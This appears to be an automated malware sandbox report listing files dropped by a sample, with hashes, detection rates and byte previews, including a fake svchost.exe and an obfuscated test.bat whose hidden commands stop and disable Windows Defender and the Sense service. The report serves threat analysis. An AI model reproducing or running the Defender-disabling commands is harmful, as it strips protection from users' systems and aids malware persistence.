                                                                                      Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERE124.tmp.txt
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):13340
                                                                                      Entropy (8bit):2.6965579144991367
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:9GiZYWwn/rhpYOOYiWDyxZHpYEZRZtEifNPeZ0wL8BlaTg5tuwV4IK73:9jZDEhOQE638zaTg5tuCfK73
                                                                                      MD5:F1F8149BE3B2A006BA70879E4039A16A
                                                                                      SHA1:58AEA8916C7033E45EC8DE1544496D86F7D3824E
                                                                                      SHA-256:4A4A0F88B18D70B7B2BBDF48D55615A08AFAECA40A2DCBEA4F57BC191259C5F3
                                                                                      SHA-512:1EA7C2F37D68E008DF95F5C02507B2ED11D35B3B0405797F13907C1649DE3B43CBF5ECB33B6933F29AA5F181F552BC7695D3749B709C58281AE0510E42F8E077
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                      C:\Users\Public\Documents\2FDD6624\svchost.exe
                                                                                      Process:C:\Users\user\Desktop\RYhdmjjr94.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):1053624
                                                                                      Entropy (8bit):6.324012336357782
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:M1VPzxljWH+fdg8yXresMdJFBwA48ayWMWPX6+Pqpn7PJuhgqCakBu7:yzxljW+g3Xub48ayWlK+ipnLJuhVkA7
                                                                                      MD5:44696D252000850D3EA71D9AE238AEDC
                                                                                      SHA1:1FB61A1DF500F9025641526CB4013D555B129A84
                                                                                      SHA-256:1B39D6BF218028DFE7BC8254A3B1682804E9BF05B8298C708C318236F64AD986
                                                                                      SHA-512:E1115A0A70B6D532633C1C60733A2AEBBDC9E14863DEAEC7F6E15604C20F9F3CE3D36132EC2B814A4C774B25A6C4C8CCAD4003724B98ABEAD2BE3F752B9D6314
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Virustotal, Detection: 46%, Browse
                                                                                      • Antivirus: Metadefender, Detection: 23%, Browse
                                                                                      • Antivirus: ReversingLabs, Detection: 51%
                                                                                      Reputation:unknown
                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......^..............0.................. ... ....@.. .......................`............`.....................................J.... ..D....................@......N................................................ ............... ..H............text........ ...................... ..`.rsrc...D.... ......................@..@.reloc.......@......................@..@................4.......H.......D...$.......7...hZ...................................................S..`.@..a...B.?.LG........m.*..mLH`|.....q.......l...'..H..y....h.3..e...-t..m.=.Z.l2..~..Cw.X....3.. .............r$$r.4...h.\.D..N........p..Q.M#z_.t...)....W.i{&~>.i.rZg.g..WX.R.."*.|f....k....A.a............N..).-u.5.8].................!V.......2.<.'.{.f1.b.yD..O`....$(..... ...]>n.&.....o....`..+.N......2...x....N...V....._D/.. .NK..D.F....6..<...#g.....$.6.#%.K..`.1....V.l.3.[,..v
                                                                                      C:\Users\Public\Documents\2FDD6624\svchost.exe:Zone.Identifier
                                                                                      Process:C:\Users\user\Desktop\RYhdmjjr94.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:modified
                                                                                      Size (bytes):26
                                                                                      Entropy (8bit):3.95006375643621
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                      Malicious:true
                                                                                      Reputation:unknown
                                                                                      Preview: [ZoneTransfer]....ZoneId=0
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):14734
                                                                                      Entropy (8bit):4.993014478972177
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:cBVoGIpN6KQkj2Wkjh4iUxtaKdROdBLNXp5nYoGib4J:cBV3IpNBQkj2Lh4iUxtaKdROdBLNZBYH
                                                                                      MD5:8D5E194411E038C060288366D6766D3D
                                                                                      SHA1:DC1A8229ED0B909042065EA69253E86E86D71C88
                                                                                      SHA-256:44EEE632DEDFB83A545D8C382887DF3EE7EF551F73DD55FEDCDD8C93D390E31F
                                                                                      SHA-512:21378D13D42FBFA573DE91C1D4282B03E0AA1317B0C37598110DC53900C6321DB2B9DF27B2816D6EE3B3187E54BF066A96DB9EC1FF47FF86FEA36282AB906367
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):19924
                                                                                      Entropy (8bit):5.558127555463889
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:tt9ZRq0a+lCZSGMYSB+MjultIG8tiQeZUD1u16zGumaEJUQYFeAD:NjGMY49CltsEpG3G/NZg
                                                                                      MD5:B36AD5223EF4DCA564037EC9D2C4FF18
                                                                                      SHA1:3A49315B5784E5C22FE87B228C709B157715FC3F
                                                                                      SHA-256:15F99480EC16F09AD0E38A42CD60AE5D7806142484951FA92E0745F04F0EEE32
                                                                                      SHA-512:6F0F2B4E872F9B4B797854E0F0A14BB23F6A37A6E5B14AE9C8822A2BDF76E3EF3F07FD351B3A3880C5D04ED1CE17DFFBFC61EA2B3D124B18200D8250138864E4
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: @...e...........G.......H.O..........................@..........H...............<@.^.L."My...::..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,......(.Microsoft.PowerShell.Commands.ManagementP................./.C..J..%...].......%.Microsoft.PowerShell.Com
                                                                                      C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe
                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):91000
                                                                                      Entropy (8bit):6.241345766746317
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                      MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                      SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                      SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                      SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                      • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Reputation:unknown
                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\test.bat
                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe
                                                                                      File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):8399
                                                                                      Entropy (8bit):4.665734428420432
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                      MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                      SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                      SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                      SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                      C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe
                                                                                      Process:C:\Users\Public\Documents\2FDD6624\svchost.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):91000
                                                                                      Entropy (8bit):6.241345766746317
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                      MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                      SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                      SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                      SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                      • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Reputation:unknown
                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\test.bat
                                                                                      Process:C:\Users\Public\Documents\2FDD6624\svchost.exe
                                                                                      File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):8399
                                                                                      Entropy (8bit):4.665734428420432
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                      MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                      SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                      SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                      SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                      C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe
                                                                                      Process:C:\Users\user\Desktop\RYhdmjjr94.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):91000
                                                                                      Entropy (8bit):6.241345766746317
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                      MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                      SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                      SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                      SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\test.bat
                                                                                      Process:C:\Users\user\Desktop\RYhdmjjr94.exe
                                                                                      File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):8399
                                                                                      Entropy (8bit):4.665734428420432
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                      MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                      SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                      SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                      SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                      C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exe
                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):91000
                                                                                      Entropy (8bit):6.241345766746317
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                      MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                      SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                      SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                      SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\test.bat
                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe
                                                                                      File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):8399
                                                                                      Entropy (8bit):4.665734428420432
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                      MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                      SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                      SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                      SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1lspoaje.tcq.ps1
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:very short file (no magic)
                                                                                      Category:dropped
                                                                                      Size (bytes):1
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:U:U
                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: 1
                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3255sxic.got.ps1
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:very short file (no magic)
                                                                                      Category:dropped
                                                                                      Size (bytes):1
